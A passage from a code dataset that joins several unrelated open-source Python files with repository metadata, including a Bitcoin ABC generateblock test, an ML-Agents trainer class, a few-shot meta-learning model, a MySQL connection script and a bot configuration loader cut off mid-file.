except Exception as ex:
logging.debug("Page not completely processed due to: %s", ex)
logging.debug("see corresponded html in file: %s", log2file(body))
# do not raise here, because it happens quite often on some complex pages
def get_action(self, uid=None):
# Search for action with specific uid and returns Request object corresponded this action.
# If uid is None, the auto-redirected action is searching, accordingly hardcoded rules.
# If no any actions found, None is returned.
#
# uid -- can be either <form id> or <form button id>; in later case, the uid has
# 'button:' prefix (e.g. for button id='login', uid='button:login')
if not self.pp:
return None
if not uid: # looking for auto-redirected request
if self.pp.script:
return self.pp.script
if self.pp.iframe_src:
return self.pp.iframe_src
if self.pp.forms and self.pp.form_auto_submit:
return self.pp.forms[0]
if self.pp.body_onload:
return self.pp.body_onload
else: # Looking for particular request
if self.pp.forms:
for form in self.pp.forms:
if form.uid == uid:
return form
if self.pp.global_action:
if self.pp.global_action.uid == uid:
return self.pp.global_action
return None
###############################################################################
# Helper functions
#
def unescape(s):
s = s.replace("<", "<")
s = s.replace(">", ">")
s = s.replace(""", '"')
s = s.replace("'", "'")
s = s.replace("&", "&")
return s
def log2file(text):
"""
Pretty simple function, saves the text into temporary file and returns it's name
:param text: string to log
:return: temporary file name
"""
handle, name = tempfile.mkstemp(suffix='.html', prefix='log_', text=True)
os.write(handle, text)
os.close(handle)
return name
class HTTPRequestFromStr(BaseHTTPRequestHandler):
def __init__(self, request_text):
self.rfile = StringIO(request_text)
self.raw_requestline = self.rfile.readline()
self.error_code = self.error_message = None
self.parse_request()
def send_error(self, code, message):
self.error_code = code
self.error_message = message
class HTTPResponseFromStr(HTTPResponse):
def __init__(self, response_text):
try:
self.init(response_text)
except httplib.UnknownProtocol as e:
# FIXME: handle HTTP/2.0 that is 'unknown' for httplib (to check go to www.google.com)
logging.debug(str(e) + " retrying with HTTP/2.0 replaced by HTTP/1.1")
self.init(response_text.replace("HTTP/2.0", "HTTP/1.1"))
def init(self, response_text):
class FakeSocket:
def __init__(self, response_str):
self._file = StringIO(response_str)
def makefile(self, *args, **kwargs):
return self._file
source = FakeSocket(response_text)
HTTPResponse.__init__(self, source)
self.begin()
| 34.204204
| 108
| 0.57489
|
b7a062e6c814c4c6e8a011bc6fbdc165762ba795
| 976
|
py
|
Python
|
swf/models/event/timer.py
|
nstott/simpleflow
|
483602deb745a09b59ad6e24052dd5096c54fad2
|
[
"MIT"
] | null | null | null |
swf/models/event/timer.py
|
nstott/simpleflow
|
483602deb745a09b59ad6e24052dd5096c54fad2
|
[
"MIT"
] | null | null | null |
swf/models/event/timer.py
|
nstott/simpleflow
|
483602deb745a09b59ad6e24052dd5096c54fad2
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
# Copyright (c) 2013, Theo Crevon
# Copyright (c) 2013, Greg Leclercq
#
# See the file LICENSE for copying permission.
from swf.models.event.base import Event
from swf.models.event.compiler import CompiledEvent
class TimerEvent(Event):
_type = 'Timer'
class CompiledTimerEvent(CompiledEvent):
_type = 'Timer'
states = (
'started', # A timer was started for the workflow execution
'start_failed', # Failed to process StartTimer decision
'fired', # A timer, previously started for this workflow execution, fired
'canceled', # A timer, previously started for this workflow execution, was successfully canceled
'cancel_failed', # Failed to process CancelTimer decision
)
transitions = {
'started': ('canceled', 'fired'),
'start_failed': ('canceled'),
'fired': ('canceled'),
'canceled': ('cancel_failed', 'fired'),
}
initial_state = 'started'
| 27.111111
| 105
| 0.655738
|
8bf863d6b82169ab1fcece848f4b93149f4f9342
| 6,537
|
py
|
Python
|
test/functional/rpc_generateblock.py
|
WORLDKING2021/bitcoin-abc
|
e98dd8358d9ca5442d80ec8a1596a8c9be486c1a
|
[
"MIT"
] | null | null | null |
test/functional/rpc_generateblock.py
|
WORLDKING2021/bitcoin-abc
|
e98dd8358d9ca5442d80ec8a1596a8c9be486c1a
|
[
"MIT"
] | null | null | null |
test/functional/rpc_generateblock.py
|
WORLDKING2021/bitcoin-abc
|
e98dd8358d9ca5442d80ec8a1596a8c9be486c1a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''Test generateblock rpc.
'''
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
class GenerateBlockTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
node = self.nodes[0]
self.log.info('Generate an empty block to address')
address = node.getnewaddress()
hash = node.generateblock(output=address, transactions=[])['hash']
block = node.getblock(blockhash=hash, verbose=2)
assert_equal(len(block['tx']), 1)
assert_equal(block['tx'][0]['vout'][0]
['scriptPubKey']['addresses'][0], address)
self.log.info('Generate an empty block to a descriptor')
hash = node.generateblock('addr(' + address + ')', [])['hash']
block = node.getblock(blockhash=hash, verbosity=2)
assert_equal(len(block['tx']), 1)
assert_equal(block['tx'][0]['vout'][0]
['scriptPubKey']['addresses'][0], address)
self.log.info(
'Generate an empty block to a combo descriptor with compressed pubkey')
combo_key = '0279be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798'
combo_address = 'bchreg:qp63uahgrxged4z5jswyt5dn5v3lzsem6c6mz8vuwd'
hash = node.generateblock('combo(' + combo_key + ')', [])['hash']
block = node.getblock(hash, 2)
assert_equal(len(block['tx']), 1)
assert_equal(block['tx'][0]['vout'][0]['scriptPubKey']
['addresses'][0], combo_address)
self.log.info(
'Generate an empty block to a combo descriptor with uncompressed pubkey')
combo_key = '0408ef68c46d20596cc3f6ddf7c8794f71913add807f1dc55949fa805d764d191c0b7ce6894c126fce0babc6663042f3dde9b0cf76467ea315514e5a6731149c67'
combo_address = 'bchreg:qqmagqc48ln8p7zk6ez2h64amcamr86qwqezwt52uy'
hash = node.generateblock('combo(' + combo_key + ')', [])['hash']
block = node.getblock(hash, 2)
assert_equal(len(block['tx']), 1)
assert_equal(block['tx'][0]['vout'][0]['scriptPubKey']
['addresses'][0], combo_address)
# Generate 110 blocks to spend
node.generatetoaddress(110, address)
# Generate some extra mempool transactions to verify they don't get
# mined
for i in range(10):
node.sendtoaddress(address, 0.001)
self.log.info('Generate block with txid')
txid = node.sendtoaddress(address, 1)
hash = node.generateblock(address, [txid])['hash']
block = node.getblock(hash, 1)
assert_equal(len(block['tx']), 2)
assert_equal(block['tx'][1], txid)
self.log.info('Generate block with raw tx')
utxos = node.listunspent(addresses=[address])
raw = node.createrawtransaction(
[{'txid': utxos[0]['txid'], 'vout':utxos[0]['vout']}], [{address: 1}])
signed_raw = node.signrawtransactionwithwallet(raw)['hex']
hash = node.generateblock(address, [signed_raw])['hash']
block = node.getblock(hash, 1)
assert_equal(len(block['tx']), 2)
txid = block['tx'][1]
assert_equal(node.gettransaction(txid)['hex'], signed_raw)
self.log.info('Fail to generate block with out of order txs')
raw1 = node.createrawtransaction(
[{'txid': txid, 'vout': 0}], [{address: 0.9999}])
signed_raw1 = node.signrawtransactionwithwallet(raw1)['hex']
txid1 = node.sendrawtransaction(signed_raw1)
raw2 = node.createrawtransaction(
[{'txid': txid1, 'vout': 0}], [{address: 0.999}])
signed_raw2 = node.signrawtransactionwithwallet(raw2)['hex']
txid2 = node.sendrawtransaction(signed_raw2)
# Reversed CTOR
txids = sorted([txid1, txid2], reverse=True)
assert_raises_rpc_error(-25,
'TestBlockValidity failed: tx-ordering',
node.generateblock,
address,
txids)
self.log.info('Fail to generate block with txid not in mempool')
missing_txid = '0000000000000000000000000000000000000000000000000000000000000000'
assert_raises_rpc_error(-5,
'Transaction ' + missing_txid + ' not in mempool.',
node.generateblock,
address,
[missing_txid])
self.log.info('Fail to generate block with invalid raw tx')
invalid_raw_tx = '0000'
assert_raises_rpc_error(-22,
'Transaction decode failed for ' + invalid_raw_tx,
node.generateblock,
address,
[invalid_raw_tx])
self.log.info('Fail to generate block with invalid address/descriptor')
assert_raises_rpc_error(-5,
'Invalid address or descriptor',
node.generateblock,
'1234',
[])
self.log.info('Fail to generate block with a ranged descriptor')
ranged_descriptor = 'pkh(tpubD6NzVbkrYhZ4XgiXtGrdW5XDAPFCL9h7we1vwNCpn8tGbBcgfVYjXyhWo4E1xkh56hjod1RhGjxbaTLV3X4FyWuejifB9jusQ46QzG87VKp/0/*)'
assert_raises_rpc_error(
-8,
'Ranged descriptor not accepted. Maybe pass through deriveaddresses first?',
node.generateblock,
ranged_descriptor,
[])
self.log.info(
'Fail to generate block with a descriptor missing a private key')
child_descriptor = 'pkh(tpubD6NzVbkrYhZ4XgiXtGrdW5XDAPFCL9h7we1vwNCpn8tGbBcgfVYjXyhWo4E1xkh56hjod1RhGjxbaTLV3X4FyWuejifB9jusQ46QzG87VKp/0\'/0)'
assert_raises_rpc_error(-5,
'Cannot derive script without private keys',
node.generateblock,
child_descriptor,
[])
if __name__ == '__main__':
GenerateBlockTest().main()
| 44.469388
| 152
| 0.59844
|
9765ab17be01169bec4312e6532afb80c5ad5807
| 10,118
|
py
|
Python
|
ml-agents/mlagents/trainers/trainer/rl_trainer.py
|
wjsghtjf/AI_SOOLZARI
|
65c05e073f7673ddec708b9e6eb58fede4d0eb5c
|
[
"Apache-2.0"
] | 1
|
2021-03-31T02:36:47.000Z
|
2021-03-31T02:36:47.000Z
|
ml-agents/mlagents/trainers/trainer/rl_trainer.py
|
wjsghtjf/AI_SOOLZARI
|
65c05e073f7673ddec708b9e6eb58fede4d0eb5c
|
[
"Apache-2.0"
] | null | null | null |
ml-agents/mlagents/trainers/trainer/rl_trainer.py
|
wjsghtjf/AI_SOOLZARI
|
65c05e073f7673ddec708b9e6eb58fede4d0eb5c
|
[
"Apache-2.0"
] | 1
|
2020-08-24T11:02:57.000Z
|
2020-08-24T11:02:57.000Z
|
# # Unity ML-Agents Toolkit
import os
from typing import Dict, List, Optional
from collections import defaultdict
import abc
import time
import attr
from mlagents.model_serialization import SerializationSettings, copy_model_files
from mlagents.trainers.policy.checkpoint_manager import (
NNCheckpoint,
NNCheckpointManager,
)
from mlagents_envs.logging_util import get_logger
from mlagents_envs.timers import timed
from mlagents.trainers.optimizer import Optimizer
from mlagents.trainers.buffer import AgentBuffer
from mlagents.trainers.trainer import Trainer
from mlagents.trainers.components.reward_signals import RewardSignalResult
from mlagents_envs.timers import hierarchical_timer
from mlagents.trainers.agent_processor import AgentManagerQueue
from mlagents.trainers.trajectory import Trajectory
from mlagents.trainers.stats import StatsPropertyType
RewardSignalResults = Dict[str, RewardSignalResult]
logger = get_logger(__name__)
class RLTrainer(Trainer): # pylint: disable=abstract-method
"""
This class is the base class for trainers that use Reward Signals.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# collected_rewards is a dictionary from name of reward signal to a dictionary of agent_id to cumulative reward
# used for reporting only. We always want to report the environment reward to Tensorboard, regardless
# of what reward signals are actually present.
self.cumulative_returns_since_policy_update: List[float] = []
self.collected_rewards: Dict[str, Dict[str, int]] = {
"environment": defaultdict(lambda: 0)
}
self.update_buffer: AgentBuffer = AgentBuffer()
self._stats_reporter.add_property(
StatsPropertyType.HYPERPARAMETERS, self.trainer_settings.as_dict()
)
self._next_save_step = 0
self._next_summary_step = 0
def end_episode(self) -> None:
"""
A signal that the Episode has ended. The buffer must be reset.
Get only called when the academy resets.
"""
for rewards in self.collected_rewards.values():
for agent_id in rewards:
rewards[agent_id] = 0
def _update_end_episode_stats(self, agent_id: str, optimizer: Optimizer) -> None:
for name, rewards in self.collected_rewards.items():
if name == "environment":
self.stats_reporter.add_stat(
"Environment/Cumulative Reward", rewards.get(agent_id, 0)
)
self.cumulative_returns_since_policy_update.append(
rewards.get(agent_id, 0)
)
self.reward_buffer.appendleft(rewards.get(agent_id, 0))
rewards[agent_id] = 0
else:
self.stats_reporter.add_stat(
optimizer.reward_signals[name].stat_name, rewards.get(agent_id, 0)
)
rewards[agent_id] = 0
def _clear_update_buffer(self) -> None:
"""
Clear the buffers that have been built up during inference.
"""
self.update_buffer.reset_agent()
@abc.abstractmethod
def _is_ready_update(self):
"""
Returns whether or not the trainer has enough elements to run update model
:return: A boolean corresponding to wether or not update_model() can be run
"""
return False
def _policy_mean_reward(self) -> Optional[float]:
""" Returns the mean episode reward for the current policy. """
rewards = self.cumulative_returns_since_policy_update
if len(rewards) == 0:
return None
else:
return sum(rewards) / len(rewards)
@timed
def _checkpoint(self) -> NNCheckpoint:
"""
Checkpoints the policy associated with this trainer.
"""
n_policies = len(self.policies.keys())
if n_policies > 1:
logger.warning(
"Trainer has multiple policies, but default behavior only saves the first."
)
policy = list(self.policies.values())[0]
model_path = policy.model_path
settings = SerializationSettings(model_path, self.brain_name)
checkpoint_path = os.path.join(model_path, f"{self.brain_name}-{self.step}")
policy.checkpoint(checkpoint_path, settings)
new_checkpoint = NNCheckpoint(
int(self.step),
f"{checkpoint_path}.nn",
self._policy_mean_reward(),
time.time(),
)
NNCheckpointManager.add_checkpoint(
self.brain_name, new_checkpoint, self.trainer_settings.keep_checkpoints
)
return new_checkpoint
def save_model(self) -> None:
"""
Saves the policy associated with this trainer.
"""
n_policies = len(self.policies.keys())
if n_policies > 1:
logger.warning(
"Trainer has multiple policies, but default behavior only saves the first."
)
policy = list(self.policies.values())[0]
model_checkpoint = self._checkpoint()
# Copy the checkpointed model files to the final output location
copy_model_files(model_checkpoint.file_path, f"{policy.model_path}.nn")
final_checkpoint = attr.evolve(
model_checkpoint, file_path=f"{policy.model_path}.nn"
)
NNCheckpointManager.track_final_checkpoint(self.brain_name, final_checkpoint)
@abc.abstractmethod
def _update_policy(self) -> bool:
"""
Uses demonstration_buffer to update model.
:return: Whether or not the policy was updated.
"""
pass
def _increment_step(self, n_steps: int, name_behavior_id: str) -> None:
"""
Increment the step count of the trainer
:param n_steps: number of steps to increment the step count by
"""
self.step += n_steps
self._next_summary_step = self._get_next_interval_step(self.summary_freq)
self._next_save_step = self._get_next_interval_step(
self.trainer_settings.checkpoint_interval
)
p = self.get_policy(name_behavior_id)
if p:
p.increment_step(n_steps)
def _get_next_interval_step(self, interval: int) -> int:
"""
Get the next step count that should result in an action.
:param interval: The interval between actions.
"""
return self.step + (interval - self.step % interval)
def _write_summary(self, step: int) -> None:
"""
Saves training statistics to Tensorboard.
"""
self.stats_reporter.add_stat("Is Training", float(self.should_still_train))
self.stats_reporter.write_stats(int(step))
@abc.abstractmethod
def _process_trajectory(self, trajectory: Trajectory) -> None:
"""
Takes a trajectory and processes it, putting it into the update buffer.
:param trajectory: The Trajectory tuple containing the steps to be processed.
"""
self._maybe_write_summary(self.get_step + len(trajectory.steps))
self._maybe_save_model(self.get_step + len(trajectory.steps))
self._increment_step(len(trajectory.steps), trajectory.behavior_id)
def _maybe_write_summary(self, step_after_process: int) -> None:
"""
If processing the trajectory will make the step exceed the next summary write,
write the summary. This logic ensures summaries are written on the update step and not in between.
:param step_after_process: the step count after processing the next trajectory.
"""
if self._next_summary_step == 0: # Don't write out the first one
self._next_summary_step = self._get_next_interval_step(self.summary_freq)
if step_after_process >= self._next_summary_step and self.get_step != 0:
self._write_summary(self._next_summary_step)
def _maybe_save_model(self, step_after_process: int) -> None:
"""
If processing the trajectory will make the step exceed the next model write,
save the model. This logic ensures models are written on the update step and not in between.
:param step_after_process: the step count after processing the next trajectory.
"""
if self._next_save_step == 0: # Don't save the first one
self._next_save_step = self._get_next_interval_step(
self.trainer_settings.checkpoint_interval
)
if step_after_process >= self._next_save_step and self.get_step != 0:
self._checkpoint()
def advance(self) -> None:
"""
Steps the trainer, taking in trajectories and updates if ready.
Will block and wait briefly if there are no trajectories.
"""
with hierarchical_timer("process_trajectory"):
for traj_queue in self.trajectory_queues:
# We grab at most the maximum length of the queue.
# This ensures that even if the queue is being filled faster than it is
# being emptied, the trajectories in the queue are on-policy.
_queried = False
for _ in range(traj_queue.qsize()):
_queried = True
try:
t = traj_queue.get_nowait()
self._process_trajectory(t)
except AgentManagerQueue.Empty:
break
if self.threaded and not _queried:
# Yield thread to avoid busy-waiting
time.sleep(0.0001)
if self.should_still_train:
if self._is_ready_update():
with hierarchical_timer("_update_policy"):
if self._update_policy():
for q in self.policy_queues:
# Get policies that correspond to the policy queue in question
q.put(self.get_policy(q.behavior_id))
else:
self._clear_update_buffer()
| 41.467213
| 119
| 0.642024
|
8a0013f3c3b1a0bbdbf50c9623759aa62293574b
| 12,338
|
py
|
Python
|
multifew/models/fumi.py
|
s-a-malik/multi-few
|
7f7d05e51ee7630026153c4a8a7c363827418735
|
[
"MIT"
] | 1
|
2021-06-02T09:10:26.000Z
|
2021-06-02T09:10:26.000Z
|
multifew/models/fumi.py
|
s-a-malik/multi-few
|
7f7d05e51ee7630026153c4a8a7c363827418735
|
[
"MIT"
] | 11
|
2021-12-12T00:15:26.000Z
|
2022-03-30T15:44:04.000Z
|
multifew/models/fumi.py
|
s-a-malik/multi-few
|
7f7d05e51ee7630026153c4a8a7c363827418735
|
[
"MIT"
] | null | null | null |
import wandb
import torch
import torch.nn as nn
import torch.nn.functional as F
from tqdm import tqdm
from collections import OrderedDict
from transformers import BertModel
from torchmeta.modules import MetaModule, MetaSequential, MetaLinear
from torchmeta.utils.gradient_based import gradient_update_parameters
from ..utils.average_meter import AverageMeter
from ..utils import utils as utils
from .common import WordEmbedding
class FUMI(nn.Module):
def __init__(self,
n_way=5,
im_emb_dim=2048,
im_hid_dim=32,
text_encoder="BERT",
text_emb_dim=300,
text_hid_dim=1024,
dictionary=None,
pooling_strat="mean",
shared_feats=True):
super(FUMI, self).__init__()
self.n_way = n_way
self.im_emb_dim = im_emb_dim
self.im_hid_dim = im_hid_dim
self.text_encoder_type = text_encoder
self.text_emb_dim = text_emb_dim # only applicable if precomputed
self.text_hid_dim = text_hid_dim
self.dictionary = dictionary # for word embeddings
self.pooling_strat = pooling_strat
if self.text_encoder_type == "BERT":
self.text_encoder = BertModel.from_pretrained('bert-base-uncased')
self.text_emb_dim = self.text_encoder.config.hidden_size
elif self.text_encoder_type == "precomputed":
self.text_encoder = nn.Identity()
elif self.text_encoder_type == "w2v" or self.text_encoder_type == "glove":
# load pretrained word embeddings as weights
self.text_encoder = WordEmbedding(self.text_encoder_type,
self.pooling_strat,
self.dictionary)
self.text_emb_dim = self.text_encoder.embedding_dim
elif self.text_encoder_type == "rand":
self.text_encoder = nn.Linear(self.text_emb_dim, self.text_emb_dim)
else:
raise NameError(f"{text_encoder} not allowed as text encoder")
for param in self.text_encoder.parameters():
param.requires_grad = False
self.shared_feats = shared_feats
if self.shared_feats:
# Text embedding to image parameters
self.net = nn.Sequential(
nn.Linear(self.text_emb_dim, self.text_hid_dim),
nn.ReLU(),
nn.Linear(
self.text_hid_dim,
self.im_hid_dim # Weights
+ 1) # Biases
)
# Bit of a hack to copy torch default weight initialisation
self.first = nn.Linear(
1,
self.im_hid_dim * self.im_emb_dim # Weights
+ self.im_hid_dim, # Biases
bias=False)
else:
# Text embedding to image parameters
self.net = nn.Sequential(
nn.Linear(self.text_emb_dim, self.text_hid_dim),
nn.ReLU(),
nn.Linear(
self.text_hid_dim,
self.im_hid_dim * (self.im_emb_dim + 1) # Weights
+ self.im_hid_dim + 1) # Biases
)
def forward(self, text_embed, device):
im_params = self.net(text_embed)
if self.shared_feats:
shared_params = self.first(torch.ones(1).to(device))
bias_len = self.im_hid_dim + 1
out = torch.empty(
len(text_embed),
self.im_hid_dim * (self.im_emb_dim + 1) + self.im_hid_dim +
1).to(device)
out[:, :bias_len - 1] = shared_params[:bias_len - 1]
out[:, bias_len - 1] = im_params[:, 0]
out[:, bias_len:-self.im_hid_dim] = shared_params[bias_len - 1:]
out[:, -self.im_hid_dim:] = im_params[:, 1:]
return out
return im_params
def evaluate(self, args, batch, optimizer, task="train"):
"""
Evaluate batch on model
Returns:
- outer_loss: outer loop loss
- acc: accuracy on query set
"""
if task == "train":
self.train()
self.zero_grad()
else:
self.eval()
# Support set
train_inputs, train_targets = batch['train']
train_inputs = [x.to(args.device) for x in train_inputs]
# train_inputs = train_inputs[3].to(device=args.device)
train_targets = train_targets.to(device=args.device)
# Query set
test_inputs, test_targets = batch['test']
test_inputs = [x.to(args.device) for x in test_inputs]
# test_inputs = test_inputs[3].to(device=args.device)
test_targets = test_targets.to(device=args.device)
test_preds = torch.zeros(test_targets.shape).to(device=args.device)
# Unpack input
if self.text_encoder_type == "BERT":
_, train_texts, train_attn_masks, train_imss = train_inputs
_, test_texts, test_attn_masks, test_imss = test_inputs
else:
_, train_texts, train_imss = train_inputs
_, test_texts, test_imss = test_inputs
outer_loss = torch.tensor(0., device=args.device)
accuracy = torch.tensor(0., device=args.device)
for task_idx, (train_target, test_target) in enumerate(
zip(train_targets, test_targets)):
n_steps = 0
if task == "train":
n_steps = args.num_train_adapt_steps
else:
n_steps = args.num_test_adapt_steps
if self.text_encoder_type == "BERT":
im_params = self.get_im_params(train_texts[task_idx],
train_target, args.device,
train_attn_masks[task_idx])
else:
im_params = self.get_im_params(train_texts[task_idx],
train_target, args.device)
for _ in range(n_steps):
train_logit = self.im_forward(train_imss[task_idx], im_params)
inner_loss = F.cross_entropy(train_logit, train_target)
grads = torch.autograd.grad(inner_loss,
im_params,
create_graph=not args.first_order)
im_params -= args.step_size * grads[0]
test_logit = self.im_forward(test_imss[task_idx], im_params)
_, test_preds[task_idx] = test_logit.max(dim=-1)
outer_loss += F.cross_entropy(test_logit, test_target)
with torch.no_grad():
accuracy += get_accuracy(test_logit, test_target)
outer_loss.div_(train_imss.shape[0])
accuracy.div_(train_imss.shape[0])
if task == "train":
optimizer.zero_grad()
outer_loss.backward()
optimizer.step()
return outer_loss.detach().cpu().numpy(), accuracy.detach().cpu(
).numpy(), test_preds, test_targets
def get_im_params(self, text, targets, device, attn_mask=None):
NK, seq_len = text.shape
if self.text_encoder_type == "BERT":
# Need to reshape batch for BERT input
bert_output = self.text_encoder(text.view(-1, seq_len),
attention_mask=attn_mask.view(
-1, seq_len))
# Get [CLS] token
text_encoding = bert_output[1].view(NK, -1) # (N*K x 768)
elif self.text_encoder_type == "rand":
# Get a random tensor as the encoding
text_encoding = 2 * torch.rand(NK, self.text_emb_dim) - 1
else:
text_encoding = self.text_encoder(text.unsqueeze(0)).squeeze()
# Transform to per-class descriptions
class_text_enc = torch.empty(self.n_way, self.text_emb_dim).to(device)
for i in range(self.n_way):
class_text_enc[i] = text_encoding[(targets == i).nonzero(
as_tuple=True)[0][0]]
return self(class_text_enc, device)
def im_forward(self, im_embeds, im_params):
bias_len = self.im_hid_dim + 1
b_im = torch.unsqueeze(im_params[:, :bias_len], 2)
w_im = im_params[:, bias_len:].view(-1, self.im_emb_dim + 1,
self.im_hid_dim)
a = torch.matmul(im_embeds, w_im[:, :-1])
h = F.relu(torch.transpose(a, 1, 2) + b_im[:, :-1])
a_out = torch.matmul(torch.transpose(h, 1, 2),
torch.unsqueeze(w_im[:, -1], 2))
out = torch.squeeze(a_out) + b_im[:, -1]
return torch.transpose(out, 0, 1)
def training_run(args, model, optimizer, train_loader, val_loader,
max_test_batches):
"""
FUMI training loop
"""
best_loss, best_acc = test_loop(args, model, val_loader, max_test_batches)
print(f"\ninitial loss: {best_loss}, acc: {best_acc}")
best_batch_idx = 0
try:
# Training loop
for batch_idx, batch in enumerate(train_loader):
train_loss, train_acc = model.evaluate(args=args,
batch=batch,
optimizer=optimizer,
task="train")
wandb.log(
{
"train/acc": train_acc,
"train/loss": train_loss,
"num_episodes": (batch_idx + 1) * args.batch_size
},
step=batch_idx)
# Eval on validation set periodically
if batch_idx % args.eval_freq == 0 and batch_idx != 0:
val_loss, val_acc = test_loop(args, model, val_loader,
max_test_batches)
is_best = val_loss < best_loss
if is_best:
best_loss = val_loss
best_batch_idx = batch_idx
wandb.log({
"val/acc": val_acc,
"val/loss": val_loss
},
step=batch_idx)
checkpoint_dict = {
"batch_idx": batch_idx,
"state_dict": model.state_dict(),
"best_loss": best_loss,
"optimizer": optimizer.state_dict(),
"args": vars(args)
}
utils.save_checkpoint(checkpoint_dict, is_best)
print(
f"\nBatch {batch_idx+1}/{args.epochs}: \ntrain/loss: {train_loss}, train/acc: {train_acc}"
f"\nval/loss: {val_loss}, val/acc: {val_acc}")
# break after max iters or early stopping
if (batch_idx > args.epochs - 1) or (
args.patience > 0
and batch_idx - best_batch_idx > args.patience):
break
except KeyboardInterrupt:
pass
return model
def test_loop(args, model, test_loader, max_num_batches):
"""
Evaluate model on val/test set.
Returns:
- avg_test_acc (float): average test accuracy per task
- avg_test_loss (float): average test loss per task
"""
avg_test_acc = AverageMeter()
avg_test_loss = AverageMeter()
test_preds = []
test_targets = []
for batch_idx, batch in enumerate(
tqdm(test_loader, total=max_num_batches, position=0, leave=True)):
test_loss, test_acc, preds, target = model.evaluate(args=args,
batch=batch,
optimizer=None,
task="test")
avg_test_acc.update(test_acc)
avg_test_loss.update(test_loss)
test_preds.append(preds)
test_targets.append(target)
if batch_idx > max_num_batches - 1:
break
return avg_test_loss.avg, avg_test_acc.avg, test_preds, test_targets
def get_accuracy(logits, targets):
_, predictions = torch.max(logits, dim=-1)
return torch.mean(predictions.eq(targets).float())
| 39.41853
| 110
| 0.544821
|
dabd248b6e3e315aa5b0207d1a654e4ec32a9fe0
| 121
|
py
|
Python
|
girvan_newman/__init__.py
|
kindeQi/Community-Detection
|
623b5162fca9948d463ae1a1a8e24cbfc90125d3
|
[
"MIT"
] | 2
|
2019-12-24T02:27:45.000Z
|
2019-12-24T02:28:00.000Z
|
girvan_newman/__init__.py
|
kindeQi/Community-Detection
|
623b5162fca9948d463ae1a1a8e24cbfc90125d3
|
[
"MIT"
] | null | null | null |
girvan_newman/__init__.py
|
kindeQi/Community-Detection
|
623b5162fca9948d463ae1a1a8e24cbfc90125d3
|
[
"MIT"
] | null | null | null |
from girvan_newman.dataset import GNDataset
from girvan_newman.model import GNModel, GNBetweenessGraph, GNModularityGraph
| 60.5
| 77
| 0.892562
|
94647894288043c0f8ee8a671055617ae06d42bb
| 59
|
py
|
Python
|
fuzzybee/utils/constant.py
|
youtaya/knight
|
6899e18ca6b1ef01daaae7d7fd14b50a26aa0aee
|
[
"MIT"
] | null | null | null |
fuzzybee/utils/constant.py
|
youtaya/knight
|
6899e18ca6b1ef01daaae7d7fd14b50a26aa0aee
|
[
"MIT"
] | null | null | null |
fuzzybee/utils/constant.py
|
youtaya/knight
|
6899e18ca6b1ef01daaae7d7fd14b50a26aa0aee
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
GENDER = ((u'男',u'男'),(u'女',u'女'))
| 19.666667
| 34
| 0.40678
|
89076ff2730fda90ecf426d357a3512e73d20017
| 497
|
py
|
Python
|
connectDB.py
|
BiancaGedorio/Python-MySQLDatabase
|
2b7c2a95ba6492e910d86905621609dff0509789
|
[
"MIT"
] | null | null | null |
connectDB.py
|
BiancaGedorio/Python-MySQLDatabase
|
2b7c2a95ba6492e910d86905621609dff0509789
|
[
"MIT"
] | null | null | null |
connectDB.py
|
BiancaGedorio/Python-MySQLDatabase
|
2b7c2a95ba6492e910d86905621609dff0509789
|
[
"MIT"
] | null | null | null |
import mysql.connector
# connecting client and database server using mysql connector module
conn = mysql.connector.connect(host='localhost',
user='root',
password='***********',
database='database'
)
cursor = conn.cursor()
# Executing the select command. It displays all the contents in a table.
cursor.execute("Select * from customers;")
for x in cursor:
print(x)
| 29.235294
| 72
| 0.545272
|
89504a2e0cd7ed217611b14984c731bcedc6e864
| 13,892
|
py
|
Python
|
bot/constants.py
|
atmishra/bot
|
ad1a33e80152343a81eeeabf0117ced76b83e273
|
[
"MIT"
] | null | null | null |
bot/constants.py
|
atmishra/bot
|
ad1a33e80152343a81eeeabf0117ced76b83e273
|
[
"MIT"
] | null | null | null |
bot/constants.py
|
atmishra/bot
|
ad1a33e80152343a81eeeabf0117ced76b83e273
|
[
"MIT"
] | null | null | null |
"""
Loads bot configuration from YAML files.
By default, this simply loads the default
configuration located at `config-default.yml`.
If a file called `config.yml` is found in the
project directory, the default configuration
is recursively updated with any settings from
the custom configuration. Any settings left
out in the custom user configuration will stay
their default values from `config-default.yml`.
"""
import logging
import os
from collections.abc import Mapping
from enum import Enum
from pathlib import Path
from typing import Dict, List
import yaml
log = logging.getLogger(__name__)
def _env_var_constructor(loader, node):
"""
Implements a custom YAML tag for loading optional environment
variables. If the environment variable is set, returns the
value of it. Otherwise, returns `None`.
Example usage in the YAML configuration:
# Optional app configuration. Set `MY_APP_KEY` in the environment to use it.
application:
key: !ENV 'MY_APP_KEY'
"""
default = None
# Check if the node is a plain string value
if node.id == 'scalar':
value = loader.construct_scalar(node)
key = str(value)
else:
# The node value is a list
value = loader.construct_sequence(node)
if len(value) >= 2:
# If we have at least two values, then we have both a key and a default value
default = value[1]
key = value[0]
else:
# Otherwise, we just have a key
key = value[0]
return os.getenv(key, default)
def _join_var_constructor(loader, node):
"""
Implements a custom YAML tag for concatenating other tags in
the document to strings. This allows for a much more DRY configuration
file.
"""
fields = loader.construct_sequence(node)
return "".join(str(x) for x in fields)
yaml.SafeLoader.add_constructor("!ENV", _env_var_constructor)
yaml.SafeLoader.add_constructor("!JOIN", _join_var_constructor)
# Pointing old tag to !ENV constructor to avoid breaking existing configs
yaml.SafeLoader.add_constructor("!REQUIRED_ENV", _env_var_constructor)
with open("config-default.yml", encoding="UTF-8") as f:
_CONFIG_YAML = yaml.safe_load(f)
def _recursive_update(original, new):
"""
Helper method which implements a recursive `dict.update`
method, used for updating the original configuration with
configuration specified by the user.
"""
for key, value in original.items():
if key not in new:
continue
if isinstance(value, Mapping):
if not any(isinstance(subvalue, Mapping) for subvalue in value.values()):
original[key].update(new[key])
_recursive_update(original[key], new[key])
else:
original[key] = new[key]
if Path("config.yml").exists():
